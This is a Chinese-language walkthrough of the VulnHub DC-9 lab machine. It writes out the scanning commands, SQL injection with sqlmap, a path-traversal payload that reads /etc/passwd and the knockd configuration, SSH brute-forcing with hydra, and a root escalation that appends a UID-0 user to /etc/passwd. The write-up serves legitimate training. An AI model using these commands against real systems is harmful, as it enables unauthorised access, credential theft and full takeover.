vulnhub系列:DC-9
靶机下载
一、信息收集
nmap扫描存活,根据mac地址寻找IP
nmap 192.168.23.0/24
nmap扫描IP 端口等信息
nmap 192.168.23.144 -p- -sV -Pn -O
访问80端口
dirsearch目录扫描
python3 dirsearch.py -u http://192.168.23.144/
页面查看,发现搜索框
发现登录框
sqlmap 工具跑一下,搜索框存在sql注入
库名
users下表名
UserDetails下字段
爆数据
登录框尝试,发现无法登录
爆一下另一个数据库Staff
表名
字段
数据
得到admin账号、密码,将密码进行md5解密
transorbital1
登录admin账户
发现多了一个add record功能
之后没什么发现,拼接一下目录扫描的文件,也没什么发现
看到页面中显示文件不存在,可能存在文件包含,尝试在当前url路径拼接
?file=../../../../..//etc/passwd
一些报告提到hnockd服务
敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来“关门”,将端口关闭,不对外监听,进一步提升了服务和系统的安全性
默认配置文件
/etc/knockd.conf
通过文件包含查看其内容
根据文档,依次进行"敲门"
nmap 192.168.23.144 -p 7469
nmap 192.168.23.144 -p 8475
nmap 192.168.23.144 -p 9842
再次扫描端口发现ssh服务已开启
二、getshell
将之前sql注入时得到的账号写入user.txt文件,密码写入pass.txt文件,使用hydra工具进行爆破
hydra -L user.txt -P pass.txt 192.168.23.144 ssh
得到以下结果
chandlerb UrAG0D!
joeyt Passw0rd
janitor Ilovepeepee
依次进行ssh连接
账号1
ssh chandlerb@192.168.23.144
UrAG0D!
没东西
账号2
ssh joeyt@192.168.23.144
Passw0rd
也没东西
账号3
ssh janitor@192.168.23.144
Ilovepeepee
发现多了一个目录
进入目录查看,发现存在几个密码
将其写入到 pass.txt 中,再次爆破,得到一个新的账号密码
hydra -L user.txt -P pass.txt 192.168.23.144 ssh
fredf:B4-Tru3-001
三、提权
ssh 连接 fredf 用户,连接成功
ssh fredf@192.168.23.144
查看当前目录没什么发现,查看当前权限
sudo -l
看到 /opt/devstuff/dist/test/test 能以 root 权限执行,进入目录,test 文件查看是乱码,在 /opt/devstuff 下发现 test.py
查看文件内容
是一个脚本文件,生成一个用户,用root权限执行,将用户写入到 /etc/passwd 中
kali 执行命令
openssl passwd -1 -salt dc9 123456
回到 /opt/devstuff/dist/test/ 目录,将账号密码写入 /tmp/dc9,再执行 test,将其写入到 /etc/passwd
echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0::/root:/bin/bash' >> /tmp/dc9
sudo ./test /tmp/dc9 /etc/passwd
切换用户到 dc9,提权成功
su dc9
123456
在 root 目录下,发现 theflag.txt,结束
